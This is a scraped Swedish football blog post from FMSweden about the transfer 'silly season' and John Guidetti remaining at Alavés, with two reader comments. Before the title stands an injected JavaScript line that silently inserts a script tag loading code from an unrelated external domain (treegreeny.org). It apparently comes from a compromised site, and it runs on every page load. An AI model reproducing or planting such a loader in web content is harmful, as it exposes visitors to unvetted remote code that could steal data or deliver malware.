;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Silly Season-hetsen – FMSweden
Meny Stäng

Fabbes blogg: Silly Season-hetsen

Blev Guidetti klar för någon ny klubb? Hur många mittbackar ska Liverpool tillslut? Nu är äntligen Silly Season över (nästan).

Silly Season. Detta fenomen som under de senaste 10-15 åren eskalerat och blivit enormt. Webbsändningar, chattar, egna poddar och hemsidor som bara följer transfermarknanden. Ingenstans kan man gå utan att ett löst rykte dyker upp, och det helt plötsligt är man på twitter och diskuterar om en mittback från Dynamo Kiev verkligen är precis vad man letat efter.

Min personlig åsikt är att det ibland kan bli lite för mycket av det goda. För mig är det intressant att läsa den dagen det faktiskt finns belägg för att det varit förhandlingar mellan klubbar, eller där det finns någon som helst substans i klubbarnas intresse av en viss spelare. Att följa konton på Twitter som bara pumpar ut nya rykten varje dag från diverse tveksamma källor tar alldeles för mycket tid, och ofta helt i onödan.

Vad är er inställning till Silly Season? Följer ni allt eller ger ni blanka fan i det?

——————————————

När de internationella transferfönstren stängde natten mot tisdag var det ändå bra mycket lugnare än för några år sedan. Vi alla minns när Peter Odemwingie åkte på vinst och förlust till Queens Park Rangers träningsanläggning utan att bli insläppt, och istället fick vända tillbaka. Eller när Liverpool sålde Torres och plockade in Andy Carroll i ren panik.

Känslan var dock att för några spelare var det för lugnt igår. Ur ett svenskt perspektiv kan jag verkligen inte förstå att John Guidetti är kvar i Alavés? Grabben behöver spela fotboll och det snabbt som bara den. Att då var kvar utan att få spela matcher – nej, jag förstår det verkligen inte.

Har ni några liknande exempel på spelare som borde flyttat för sitt eget bäst? Finns säkert hur många som helst.

——————————————

Samtidigt som de stora transferfönstren stängde är det nu det börjar bli intressant i den svenska fotbollen. Spelare som inte fick till en transfer blir nu helt plötsligt tillgängliga för klubbar som de blankt hade tackat nej till för en månad sedan. Därför ska det bli kul att få se om det är någon svensk klubb som kan stå för en riktig dundervärvning. Guidetti hem till Allsvenskan? Nja, den känns otänkbar. Men det finns flera andra spelare som borde vara aktuella innan fönstret stänger i slutet på mars.

 

Ciao.

Please wait...

Liknande Inlägg

3 kommentarer

  1. Peter Hecktor

    Jag tycker dock att det blivit lite mer sansat nu. Ofta har några personer runt varje klubb bra ingångar som kan balansera upp alla rykten. Sådana som Fabrizio Romano gör det också svårare för tidningarna att slänga ur sig skräp för det skjuts ner direkt utav “dom stora”.

    • raca14

      Vad gäller Ahmedhodzic, så blir det inte förrän tidigast i sommar. Inga tillräckliga bud för MFF att acceptera då killen är ung och står under kontrakt ett tag till. Kanske lika bra det, då han får ännu mer tid till att utvecklas i lugn och ro och kanske på så sätt lyckas få ännu vassare bud från en klubb med en bra plan för honom.

Lämna ett svar